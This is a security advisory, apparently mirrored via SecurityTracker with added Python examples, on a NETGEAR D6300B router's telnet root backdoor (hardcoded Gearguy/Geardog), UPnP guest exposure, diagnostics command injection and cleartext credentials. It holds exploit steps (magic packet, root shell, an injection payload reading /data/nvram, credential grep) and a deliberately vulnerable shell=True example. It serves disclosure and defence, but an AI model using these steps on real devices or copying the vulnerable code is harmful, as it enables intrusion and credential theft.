Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router
Vendors:   NETGEAR
NETGEAR Router D6300B Telnet Backdoor Lets Remote Users Gain Root Access
SecurityTracker Alert ID:  1029727
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 5 2014
Impact:   Root access via network
Exploit Included:  Yes  
Version(s): Model D6300B; Firmware V1.0.0.14_1.0.14
Description:   A vulnerability was reported in NETGEAR Router D6300B. A remote user can gain root access on the target system.

A remote user on the LAN, the WiFi, or the guest WiFi can send a specially crafted packet to the telnet service (23/TCP) to activate a root shell on the target device. The backdoor cannot be reached from the WAN interface.

On systems with a USB drive attached, a remote user on the guest wireless network can access files on the drive via UPnP, although the HTTP and FTP shares are blocked from the guest network. Port forwarding can also be enabled from the guest network to reach services on the private network.

A remote authenticated user can exploit a flaw in the web interface to execute arbitrary operating system commands.

The web interface is not available over HTTPS. Authentication credentials are sent in plaintext via HTTP.

The system stores the web interface authentication credentials in clear text in the '/data/nvram' file.

The vendor was notified on December 12, 2013.

Daniel Sauder, Marcel Mangold, and Pascal Uter reported this vulnerability.

Impact:   A remote user on the local network can gain root access on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Access control error

Message History:   None.

 Source Message Contents

Subject:  Security Advisory: NETGEAR Router D6300B Firmware: V1.0.0.14_1.0.14


Advisory ID: SYSS-2013-001
Product: NETGEAR Router D6300B / Firmware: V1.0.0.14_1.0.14 (latest)
Vendor: Netgear
Affected Version(s): until V1.0.0.14_1.0.14 (latest)
Tested Version(s): V1.0.0.14_1.0.14 (latest)
Vulnerability Type: Root-Shell, OS Command Injection, UPnP misconfiguration
Risk Level: High
Solution Status: None
Vendor Notification: 2013-12-12
Solution Date: None
Public Disclosure: 2014-02-04
CVE Reference: Not assigned
Author of Advisory: Marcel Mangold <>, Pascal Uter <>
Document date: 2014-02-04
Abstract: Root shell telnet backdoor allows an attacker with access to LAN, 
  WiFi, or Guest WiFi to take over the device. Due to a UPnP misconfiguration, 
  shares which should be visible in the internal network only can be accessed 
  from the Guest WiFi, and port forwarding can be activated for the internal 
Credits: Daniel Sauder <>

* Overview:

(1) It is possible to activate a telnet root shell by sending a specifically 
  crafted packet to the telnet service from within the LAN, WiFi, or guest WiFi.
  It is not possible to exploit this vulnerability over the WAN interface.

(2) The router suffers from several UPnP-related issues. The main problem is 
  that UPnP is available from the guest WiFi. The router provides file shares 
  (if a USB flash drive is plugged in) via HTTP, FTP, and UPnP. While the HTTP 
  and FTP shares cannot be accessed from the guest WiFi, the files can be 
  accessed via UPnP from the guest WiFi. Port forwarding can also be activated 
  from the guest WiFi, which gives an attacker on the guest WiFi a way to reach 
  services that are only available in the private WiFi.

(3) The web interface is vulnerable to OS command injection by authenticated users.

(4) The web interface cannot be accessed via HTTPS. The login credentials are 
  submitted as clear text over HTTP.

(5) The web interface login credentials are stored in clear text in the 
  /data/nvram file. This can be exploited in combination with (1) or (3).
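
The check a practitioner wants for point (2) is "does UPnP answer from the segment I am on?". The following is an added example, not the SySS advisory's tooling: it builds an SSDP M-SEARCH, parses the unicast replies, and flags the two services the advisory is concerned with (a media server exposing the USB drive, and WANIPConnection, which carries the AddPortMapping action used for port forwarding). Run discover() from the guest WiFi; a reply whose LOCATION points at the router's private address confirms the exposure. SAMPLE_REPLY is a constructed reply for offline testing; the router address and server string in it are assumed, not captured from a D6300B.

```python
"""Check whether UPnP/SSDP answers from the network segment you are on.

Added example, not the SySS advisory's tooling. SAMPLE_REPLY is constructed;
192.168.0.1 and the SERVER string are assumed values.
"""
import socket
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

SSDP_GROUP = "239.255.255.250"
SSDP_PORT = 1900


def build_msearch(st: str = "ssdp:all", mx: int = 2) -> bytes:
    """Build an SSDP M-SEARCH request (UPnP Device Architecture 1.0 format)."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_GROUP}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {st}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(raw: bytes) -> Optional[Dict[str, str]]:
    """Parse a unicast SSDP reply into {HEADER-NAME: value} (names upper-cased).
    Returns None for anything that is not an 'HTTP/1.1 200 OK' search response."""
    text = raw.decode("utf-8", errors="replace")
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def exposure_flags(headers: Dict[str, str]) -> Set[str]:
    """Map one reply to what an attacker on this segment could reach."""
    ident = " ".join((headers.get("ST", ""), headers.get("USN", ""))).lower()
    flags: Set[str] = set()
    if "mediaserver" in ident or "contentdirectory" in ident:
        flags.add("file-share")        # USB drive browsable via UPnP AV
    if "wanipconnection" in ident or "wanpppconnection" in ident:
        flags.add("port-forwarding")   # AddPortMapping reachable from here
    return flags


def device_host(headers: Dict[str, str]) -> Optional[str]:
    """Host part of the LOCATION header (the device description URL)."""
    loc = headers.get("LOCATION")
    return urlparse(loc).hostname if loc else None


def discover(timeout: float = 3.0, st: str = "ssdp:all") -> List[Dict[str, str]]:
    """Send one M-SEARCH and collect every parseable reply until timeout (needs a network)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    found: List[Dict[str, str]] = []
    try:
        sock.sendto(build_msearch(st), (SSDP_GROUP, SSDP_PORT))
        while True:
            data, addr = sock.recvfrom(65535)
            hdrs = parse_ssdp_response(data)
            if hdrs is not None:
                hdrs["_FROM"] = addr[0]  # who answered, for cross-checking LOCATION
                found.append(hdrs)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


# Constructed sample reply (not captured from a D6300B); address and SERVER are assumed.
SAMPLE_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.168.0.1:5000/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 example-upnpd/1.0\r\n"
    b"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000"
    b"::urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for reply in discover():
        print(reply["_FROM"], device_host(reply), sorted(exposure_flags(reply)), reply.get("ST"))
```

The ST filter defaults to ssdp:all so that both the root device and every embedded service announce themselves; if nothing at all answers from the guest WiFi but the same query answers from the private WiFi, the segmentation is working as intended.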

* Details concerning (1), (3), (5):
Port 23/TCP (telnet) of the device is open and accessible from within the LAN, 
  WiFi, or guest WiFi. While it is possible to connect to the telnet port, the 
  telnet service does not respond until it receives a specifically crafted 
  packet. This packet is derived from the MAC address of the device, a 
  specific constant string, a user name, and a password. The user name and 
  password are Gearguy / Geardog. To send the packet, the tool published by 
  Paul Gebheim in 2009 can be used:

./ 28C68Exxxxxx Gearguy Geardog

Afterwards, it is possible to connect to a telnet root shell without any 
  further credentials:

nc 23
BusyBox v1.17.2 (2013-05-02 18:01:36 CST) hush - the humble shell
/ #

Note: It is not possible to use this back door from the WAN interface.

The administrative web interface of the device is vulnerable to OS command 
  injection. For example, the last field of the IP address in the ping tool on 
  the diagnostics page can be used to append another OS command. The first 
  lines of the command output are returned by the web 

######## REQUEST: #########
POST /diag.cgi?id=991220771 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95


######## RESPONSE: ########
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"

<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
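
Two side notes on the request above: its `Authorization: Basic YWRtaW46cGFzc3dvcmQ=` header is base64 for `admin:password`, sent over plain HTTP as point (4) describes, and the POST body that carries the injected ping target is not reproduced in this copy of the advisory. The following is an added example, not the D6300B firmware (whose diag.cgi is a native binary): it reconstructs the bug class of point (3) in Python, with the vulnerable builder next to a hardened one. The vulnerable version concatenates the four address fields into a shell command line, so a last field of `1;cat /data/nvram` runs a second command with the web server's privileges; the hardened version parses the reassembled address with the ipaddress module and hands an argv list to subprocess without a shell. Function and field names are assumptions; the advisory does not give the real form field names.

```python
"""Vulnerable vs. hardened handling of a diagnostics 'ping' target.

Added example, not the D6300B firmware. Names are assumed for illustration.
"""
import ipaddress
import subprocess
from typing import List


def build_ping_cmd_vulnerable(ip1: str, ip2: str, ip3: str, ip4: str) -> str:
    """BUG: untrusted form fields are interpolated into a shell command string."""
    return f"ping -c 3 {ip1}.{ip2}.{ip3}.{ip4}"


def run_vulnerable(ip1: str, ip2: str, ip3: str, ip4: str) -> str:
    """shell=True makes ';', '|', '`' and '$(...)' in any field executable. Do not copy."""
    cmd = build_ping_cmd_vulnerable(ip1, ip2, ip3, ip4)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30).stdout


def build_ping_argv_safe(ip1: str, ip2: str, ip3: str, ip4: str) -> List[str]:
    """Reject anything that is not a literal IPv4 address, then build argv (no shell).

    ipaddress.IPv4Address raises ValueError on ';', spaces, hostnames, extra
    dots and out-of-range octets, so metacharacters never reach a shell.
    """
    candidate = ".".join((ip1, ip2, ip3, ip4))
    addr = ipaddress.IPv4Address(candidate)  # ValueError on anything non-numeric
    return ["ping", "-c", "3", str(addr)]


def is_safe_target(ip1: str, ip2: str, ip3: str, ip4: str) -> bool:
    """Input-validation wrapper for use in a request handler."""
    try:
        build_ping_argv_safe(ip1, ip2, ip3, ip4)
        return True
    except ValueError:
        return False


def run_safe(ip1: str, ip2: str, ip3: str, ip4: str) -> str:
    """argv list + shell=False: the address is one argument, never parsed by sh."""
    argv = build_ping_argv_safe(ip1, ip2, ip3, ip4)
    return subprocess.run(argv, capture_output=True, text=True, timeout=30).stdout


if __name__ == "__main__":
    payload = ("192", "168", "0", "1;cat /data/nvram")  # the shape of input point (3) describes
    print("vulnerable command line:", build_ping_cmd_vulnerable(*payload))
    print("hardened accepts it?   ", is_safe_target(*payload))
    print("hardened argv for 192.168.0.1:", build_ping_argv_safe("192", "168", "0", "1"))
```

Validating the reassembled value as an address, rather than escaping the fields, is the point: the diagnostics page only ever needs an IP address, so anything else is rejected outright and the question of which shell metacharacters to escape never arises.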


The web interface login credentials are stored in clear text in the /data/nvram 
 file. This can be exploited in combination with (1), the telnet back door, or 
 (3), the OS command injection in the web interface. Here, the exploitation with
  the telnet back door:

/ # grep http_passwd /data/nvram
grep http_passwd /data/nvram

* Solution:
(1) Wait for a new firmware.

(2) Wait for a new firmware. Disable the guest Wifi or UPnP for partical 

(3) Only give the web interface credentials to people to whom you would also 
  grant root access to the device. / Wait for a new firmware.

(4) Wait for a new firmware.

(5) Wait for a new firmware.

* Disclosure timeline:
2013-08-02 - Flaws were discovered in firmware V1.0.0.06
2013-12-12 - Flaws were verified for firmware version V1.0.0.14
2013-12-12 - First contact to vendor
2013-12-20 - Sent this document to vendor
2014-02-04 - Public Disclosure

* GPG:

E-Mail: marcel (dot) mangold (at) syss (dot) de
Public Key:
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

E-Mail: pascal (dot) uter (at) syss (dot) de
Public Key:
Key ID: 351596DF
Key Fingerprint: D269 30F3 F7DD 2C93 95B3 951C 8C89 45B0 3515 96DF

* Copyright:
Creative Commons - Attribution (by) - Version 3.0

